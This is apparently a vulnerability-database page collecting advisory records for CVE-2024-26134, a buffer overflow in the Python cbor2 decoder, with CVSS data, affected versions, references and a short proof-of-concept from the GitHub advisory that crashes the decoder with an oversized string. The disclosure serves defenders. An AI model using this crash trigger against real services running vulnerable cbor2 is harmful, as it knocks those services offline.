      "details": "cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue.",
      "id": "GSD-2024-26134",
      "modified": "2024-02-15T06:02:25.142407Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2024-26134",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "cbor2",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "=",
                          "version_value": "\u003e= 5.5.1, \u003c 5.6.2"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "agronholm"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue."
          }
        ]
      },
      "impact": {
        "cvss": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "cweId": "CWE-120",
                "lang": "eng",
                "value": "CWE-120: Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m",
            "refsource": "MISC",
            "url": "https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m"
          },
          {
            "name": "https://github.com/agronholm/cbor2/pull/204",
            "refsource": "MISC",
            "url": "https://github.com/agronholm/cbor2/pull/204"
          },
          {
            "name": "https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542",
            "refsource": "MISC",
            "url": "https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542"
          },
          {
            "name": "https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df",
            "refsource": "MISC",
            "url": "https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df"
          },
          {
            "name": "https://github.com/agronholm/cbor2/releases/tag/5.6.2",
            "refsource": "MISC",
            "url": "https://github.com/agronholm/cbor2/releases/tag/5.6.2"
          },
          {
            "name": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/",
            "refsource": "MISC",
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/"
          },
          {
            "name": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/",
            "refsource": "MISC",
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/"
          },
          {
            "name": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/",
            "refsource": "MISC",
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-375g-39jq-vq7m",
        "discovery": "UNKNOWN"
      }
    },
    "nvd.nist.gov": {
      "cve": {
        "descriptions": [
          {
            "lang": "en",
            "value": "cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue."
          },
          {
            "lang": "es",
            "value": "cbor2 proporciona codificaci\u00f3n y decodificaci\u00f3n para el formato de serializaci\u00f3n de representaci\u00f3n concisa de objetos binarios (CBOR) (RFC 8949). A partir de la versi\u00f3n 5.5.1 y antes de la versi\u00f3n 5.6.2, un atacante puede bloquear un servicio que utiliza cbor2 para analizar un binario CBOR enviando un objeto lo suficientemente largo. La versi\u00f3n 5.6.2 contiene un parche para este problema."
          }
        ],
        "id": "CVE-2024-26134",
        "lastModified": "2024-04-19T23:15:10.433",
        "metrics": {
          "cvssMetricV31": [
            {
              "cvssData": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              },
              "exploitabilityScore": 3.9,
              "impactScore": 3.6,
              "source": "security-advisories@github.com",
              "type": "Secondary"
            }
          ]
        },
        "published": "2024-02-19T23:15:07.810",
        "references": [
          {
            "source": "security-advisories@github.com",
            "url": "https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://github.com/agronholm/cbor2/pull/204"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://github.com/agronholm/cbor2/releases/tag/5.6.2"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/"
          },
          {
            "source": "security-advisories@github.com",
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/"
          }
        ],
        "sourceIdentifier": "security-advisories@github.com",
        "vulnStatus": "Awaiting Analysis",
        "weaknesses": [
          {
            "description": [
              {
                "lang": "en",
                "value": "CWE-120"
              }
            ],
            "source": "security-advisories@github.com",
            "type": "Primary"
          }
        ]
      }
    }
  }
}

FKIE_CVE-2024-26134

Vulnerability from fkie_nvd - Published: 2024-02-19 23:15 - Updated: 2025-01-02 14:18

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542	Product
security-advisories@github.com	https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df	Patch
security-advisories@github.com	https://github.com/agronholm/cbor2/pull/204	Issue Tracking
security-advisories@github.com	https://github.com/agronholm/cbor2/releases/tag/5.6.2	Release Notes
security-advisories@github.com	https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m	Exploit, Vendor Advisory
security-advisories@github.com	https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/	Mailing List
security-advisories@github.com	https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/	Mailing List
security-advisories@github.com	https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/	Mailing List
af854a3a-2127-422b-91ae-364da2661108	https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/agronholm/cbor2/pull/204	Issue Tracking
af854a3a-2127-422b-91ae-364da2661108	https://github.com/agronholm/cbor2/releases/tag/5.6.2	Release Notes
af854a3a-2127-422b-91ae-364da2661108	https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/	Mailing List
af854a3a-2127-422b-91ae-364da2661108	https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/	Mailing List
af854a3a-2127-422b-91ae-364da2661108	https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/	Mailing List

Impacted products

Vendor	Product	Version
agronholm	cbor2	*
fedoraproject	fedora	38
fedoraproject	fedora	39
fedoraproject	fedora	40

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:agronholm:cbor2:*:*:*:*:*:python:*:*",
              "matchCriteriaId": "29EB593C-8078-4174-9947-A3590CF93D51",
              "versionEndExcluding": "5.6.2",
              "versionStartIncluding": "5.5.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC559B26-5DFC-4B7A-A27C-B77DE755DFF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8EDB836-4E6A-4B71-B9B2-AA3E03E0F646",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:fedoraproject:fedora:40:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA277A6C-83EC-4536-9125-97B84C4FAF59",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue."
    },
    {
      "lang": "es",
      "value": "cbor2 proporciona codificaci\u00f3n y decodificaci\u00f3n para el formato de serializaci\u00f3n de representaci\u00f3n concisa de objetos binarios (CBOR) (RFC 8949). A partir de la versi\u00f3n 5.5.1 y antes de la versi\u00f3n 5.6.2, un atacante puede bloquear un servicio que utiliza cbor2 para analizar un binario CBOR enviando un objeto lo suficientemente largo. La versi\u00f3n 5.6.2 contiene un parche para este problema."
    }
  ],
  "id": "CVE-2024-26134",
  "lastModified": "2025-01-02T14:18:48.553",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2024-02-19T23:15:07.810",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/agronholm/cbor2/pull/204"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/agronholm/cbor2/releases/tag/5.6.2"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Mailing List"
      ],
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Mailing List"
      ],
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Mailing List"
      ],
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/agronholm/cbor2/pull/204"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/agronholm/cbor2/releases/tag/5.6.2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List"
      ],
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List"
      ],
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List"
      ],
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-120"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-120"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GHSA-375G-39JQ-VQ7M

Vulnerability from github – Published: 2024-02-21 00:09 – Updated: 2025-01-14 15:59

Summary

Potential buffer overflow in CBOR2 decoder

Details

Summary

Ever since https://github.com/agronholm/cbor2/pull/204 (or specifically https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542) was merged, I can create a reproducible crash when running the snippet under PoC on a current Debian bullseye aarm64 on a Raspberry Pi 3 (I was not able to reproduce this on my x86_64 Laptop with Python 3.11; I suspect because there is enough memory to allocate still)

Details

PoC

import json
import concurrent.futures
import cbor2

def test():
    obj = "x" * 131128
    cbor_enc = cbor2.dumps(obj)
    return cbor2.loads(cbor_enc)

with concurrent.futures.ProcessPoolExecutor() as executor:
    future = executor.submit(test)
    print(future.result())

malloc(): unsorted double linked list corrupted
Traceback (most recent call last):
  File "test.py", line 14, in <module>
    print(future.result())
  File "/usr/lib/python3.9/concurrent/futures/_base.py", line 440, in result
    return self.__get_result()
  File "/usr/lib/python3.9/concurrent/futures/_base.py", line 389, in __get_result
    raise self._exception
concurrent.futures.process.BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.

If one calls it without the indirection via the pool executor, a SystemError is shown that hides the buffer overflow.

import json
import cbor2

def test():
    obj = "x" * 131128
    cbor_enc = cbor2.dumps(obj)
    return cbor2.loads(cbor_enc)

print(test())

Traceback (most recent call last):
  File "test.py", line 12, in <module>
    print(test())
  File "test.py", line 9, in test
    return cbor2.loads(cbor_enc)
SystemError: <built-in function loads> returned NULL without setting an error

Impact

An attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object.

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "cbor2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.5.1"
            },
            {
              "fixed": "5.6.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-26134"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-120"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-02-21T00:09:03Z",
    "nvd_published_at": "2024-02-19T23:15:07Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nEver since https://github.com/agronholm/cbor2/pull/204 (or specifically https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542) was merged, I can create a reproducible crash when running the snippet under PoC on a current Debian bullseye aarm64 on a Raspberry Pi 3 (I was **not** able to reproduce this on my x86_64 Laptop with Python 3.11; I suspect because there is enough memory to allocate still)\n\n## Details\n\n\n### PoC\n```py\nimport json\nimport concurrent.futures\nimport cbor2\n\ndef test():\n    obj = \"x\" * 131128\n    cbor_enc = cbor2.dumps(obj)\n    return cbor2.loads(cbor_enc)\n\nwith concurrent.futures.ProcessPoolExecutor() as executor:\n    future = executor.submit(test)\n    print(future.result())\n```\n\n```\nmalloc(): unsorted double linked list corrupted\nTraceback (most recent call last):\n  File \"test.py\", line 14, in \u003cmodule\u003e\n    print(future.result())\n  File \"/usr/lib/python3.9/concurrent/futures/_base.py\", line 440, in result\n    return self.__get_result()\n  File \"/usr/lib/python3.9/concurrent/futures/_base.py\", line 389, in __get_result\n    raise self._exception\nconcurrent.futures.process.BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.\n```\n\nIf one calls it without the indirection via the pool executor, a SystemError is shown that hides the buffer overflow.\n\n```py\nimport json\nimport cbor2\n\ndef test():\n    obj = \"x\" * 131128\n    cbor_enc = cbor2.dumps(obj)\n    return cbor2.loads(cbor_enc)\n\nprint(test())\n```\n\n```\nTraceback (most recent call last):\n  File \"test.py\", line 12, in \u003cmodule\u003e\n    print(test())\n  File \"test.py\", line 9, in test\n    return cbor2.loads(cbor_enc)\nSystemError: \u003cbuilt-in function loads\u003e returned NULL without setting an error\n```\n\n### Impact\nAn attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object.",
  "id": "GHSA-375g-39jq-vq7m",
  "modified": "2025-01-14T15:59:39Z",
  "published": "2024-02-21T00:09:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26134"
    },
    {
      "type": "WEB",
      "url": "https://github.com/agronholm/cbor2/pull/204"
    },
    {
      "type": "WEB",
      "url": "https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542"
    },
    {
      "type": "WEB",
      "url": "https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/agronholm/cbor2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/agronholm/cbor2/releases/tag/5.6.2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/cbor2/PYSEC-2024-155.yaml"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Potential buffer overflow in CBOR2 decoder"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2024-26134 (GCVE-0-2024-26134)

OPENSUSE-SU-2025-20133-1

OPENSUSE-SU-2025:14733-1

PYSEC-2024-155

GSD-2024-26134

FKIE_CVE-2024-26134

GHSA-375G-39JQ-VQ7M

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature